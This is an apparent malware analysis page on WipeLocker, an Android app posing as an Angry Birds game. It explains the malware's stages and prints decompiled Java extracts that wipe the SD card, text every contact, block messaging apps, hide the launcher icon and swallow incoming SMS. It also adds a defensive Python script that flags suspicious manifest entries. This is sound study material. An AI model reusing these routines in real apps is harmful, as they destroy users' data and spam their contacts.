WipeLocker

September 2014

Summary

Erase data on SD card and block social applications

GroDDViewer graphs:

Details

WipeLocker is a malware discovered in September 2014. Its purpose is to wipe the SD card and block certain social apps while displaying a hacking message. It also sends SMS messages to the victim’s contacts. The malware presents itself as a fake Angry Bird Transformers game.

Once the application is launched, the main activity performs three actions.

Stage 1: Starting the malicious service

The application first starts the service IntentServiceClass. Note that this service can also be started by a BOOT_COMPLETED receiver named BootReceiver. The purpose of this service is to schedule the execution of MyServices.getTopActivity() every 0.5 seconds and MyServices.Async_sendSMS() every 5 seconds.

getTopActivity() is a function that checks the current foreground activity; if it is the SMS/MMS Android app, Facebook, Hangouts or WhatsApp, it displays a fullscreen image “Obey or Be Hacked” on the screen, making it impossible to use those apps.

Async_sendSMS() is an AsyncTask that sends a text message to all the victim’s contacts. It will spam the message “HEY!!! <contact_name> Elite has hacked you.Obey or be hacked” every 5 seconds.

Stage 2: Activating the device administration features

The second action of the malware is to ask the user to activate the device administration features of the app. If the user declines, the app asks again, over and over, until the user agrees. Administration features allow an application to perform sensitive operations such as wiping the device content or enforcing a password security policy. The file res/xml/device_admin_sample.xml lists the operations the application wishes to handle. However, the content of this file is empty, which means that the application does not request any sensitive operation. In fact, the only purpose of this stage is to make the app much harder to uninstall, because device administrators cannot be uninstalled like normal apps. If the user accepts, the app closes and removes its icon from the launcher, with the same code as SaveMe.

Stage 3: Wiping the SD card

The last action performed by the malware is the deletion of all the files and directories of the external storage. Even if the user declined the device administration features, the function wipeMemoryCard() is called. This function uses Environment.getExternalStorageDirectory() to get the path to the external storage, then calls File.listFiles() to iterate over its entries and File.delete() to delete each of them.

Stage 4: Intercepting SMS

The last feature that comes with the malware is the interception of incoming SMS. It is simply a receiver named SMSReceiver that is triggered by the SMS_RECEIVED intent. When an SMS is received, the malware automatically replies to the sender with the message “Elite has hacked you.Obey or be hacked”. The victim is not notified by the system about the incoming SMS because the receiver has the highest possible priority (2147483647 in the manifest) and calls abortBroadcast() right after reading the message, so the ordered broadcast never reaches the lower-priority stock messaging app.
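As an added example (not part of the original analysis), the following Python script shows the static triage a defender can run over an AndroidManifest.xml to flag the manifest-level indicators described in stages 2 and 4: an SMS_RECEIVED receiver registered far above the documented priority range, a BOOT_COMPLETED receiver, and a receiver bound with BIND_DEVICE_ADMIN. The manifest is constructed for illustration; SMSReceiver and BootReceiver are the names given above, while .AdminReceiver is an assumed name since the analysis does not name the device-admin receiver class.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # the android: attribute namespace
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

# Constructed manifest for illustration; .AdminReceiver is an assumed name.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.elite">
  <application>
    <receiver android:name=".SMSReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""


def triage(manifest_xml, max_sane_priority=1000):
    """Return one finding string per suspicious receiver pattern (empty list = clean).
    Intent-filter priorities are documented to lie in -1000..1000; anything above
    max_sane_priority is an app trying to win the SMS broadcast before the stock app."""
    findings = []
    for rcv in ET.fromstring(manifest_xml).iter("receiver"):
        name = rcv.get(A + "name")
        if rcv.get(A + "permission") == BIND_DEVICE_ADMIN:
            findings.append(f"{name}: device admin receiver (resists uninstall)")
        for flt in rcv.findall("intent-filter"):
            prio = int(flt.get(A + "priority", "0"))
            actions = {a.get(A + "name") for a in flt.findall("action")}
            if SMS_RECEIVED in actions and prio > max_sane_priority:
                findings.append(f"{name}: SMS_RECEIVED at priority {prio} "
                                "(can abortBroadcast() before the stock SMS app)")
            if BOOT_COMPLETED in actions:
                findings.append(f"{name}: restarts on BOOT_COMPLETED")
    return findings
```

Running triage(SAMPLE_MANIFEST) yields three findings, one per receiver; on a manifest with no receivers it returns an empty list.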

Other resources

Triggering

The launcher icon triggers all the features. A reboot of the device only triggers the service IntentServiceClass.

Characteristics

Malware type:

  • Bricker / Eraser

Attacks:

  • Confidentiality
  • Integrity
  • Availability
  • Normal use

Infection technique: Standalone application

Malicious code type:

  • Use Java code

Hiding techniques:

  • Remove its launcher icon

Triggering techniques:

  • Executed at launch
  • Waits for a particular intent

Samples

Java source code extracts:

onCreate.java is the function called when the app is launched. The 3 steps described in the details section are clearly visible.
wipeMemoryCard.java is the function used to erase all data on the SD card; inside it we can see a call to another function, wipeDirectory().
Async_sendSMS.java is the AsyncTask of the MyServices class which sends SMS messages every 5 seconds.
getTopActivity.java is the function executed every 0.5 seconds by MyServices in order to block social apps.
HideAppFromLauncher.java is the function used to hide the launcher icon when the app becomes a device administrator.

onCreate.java

// in file com/elite/MainActivity.java

protected void onCreate(final Bundle bundle) {

	super.onCreate(bundle);
	this.setContentView(2130903040);

	//Here are the 3 steps we described :
	this.startService(new Intent(this.getApplicationContext(), IntentServiceClass.class));
	new DeviceManager().activateDeviceAdmin((Activity)this, 1000);
	this.wipeMemoryCard();
}

wipeMemoryCard.java

// in file com/elite/MainActivity.java

public void wipeMemoryCard() {

	final File file = new File(Environment.getExternalStorageDirectory().toString());
	try {
		final File[] listFiles = file.listFiles();

		if (listFiles != null && listFiles.length > 0) {

			for (int length = listFiles.length, i = 0; i < length; ++i) {

				final File file2 = listFiles[i];

				//If it's a directory
				if (file2.isDirectory()) {
					wipeDirectory(file2.toString());
					file2.delete();
				}
				//If it's a file
				else { file2.delete(); }
			}
			return;
		}
		file.delete();
	}
	catch (Exception ex) {}
}

Async_sendSMS.java

// in file com/elite/MyServices.java
// extract of the AsyncTask "Async_sendSMS" (inner class of MyServices)

Thread.sleep(5000L);
// Enumerate every phone number of the victim's contacts
final Cursor query = this.contextTask.getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI,
								  null, null, null, null);
while (query.moveToNext()) {
	// 2131230726 is the string resource "Elite has hacked you.Obey or be hacked"
	MyServices.this.sendSMS(this.contextTask, query.getString(query.getColumnIndex("data1")),
			    "HEY!!! " + query.getString(query.getColumnIndex("display_name"))
			    + " " + this.contextTask.getResources().getString(2131230726));
}
query.close();

getTopActivity.java

// in file com/elite/MyServices.java

public void getTopActivity(final Context context) {

	//Getting the foreground activity
	final String packageName = ((ActivityManager)context.getSystemService("activity"))
				   .getRunningTasks(1).get(0).topActivity.getPackageName();

	//Facebook, Hangouts, WhatsApp and the stock SMS/MMS app
	if ("com.facebook.katana".equalsIgnoreCase(packageName) || "com.google.android.talk".equalsIgnoreCase(packageName)
	     || "com.whatsapp".equalsIgnoreCase(packageName) || "com.android.mms".equalsIgnoreCase(packageName))
	{
		final Intent intent = new Intent(context, LockScreen.class);
		// 335577088 = 0x14008000 = FLAG_ACTIVITY_NEW_TASK | FLAG_ACTIVITY_CLEAR_TOP | FLAG_ACTIVITY_CLEAR_TASK
		intent.setFlags(335577088);
		context.startActivity(intent);
	}
}

HideAppFromLauncher.java

// in file com/elite/MainActivity.java

public void HideAppFromLauncher(final Context context) {
	while (true) {
		try {
			context.getPackageManager().setComponentEnabledSetting(this.getComponentName(), 2, 1);
			// 2 = COMPONENT_ENABLED_STATE_DISABLED; 1 = DONT_KILL_APP
			this.finish();
		}
		catch (Exception ex) {
			ex.printStackTrace();
			continue;
		}
		break;
	}
}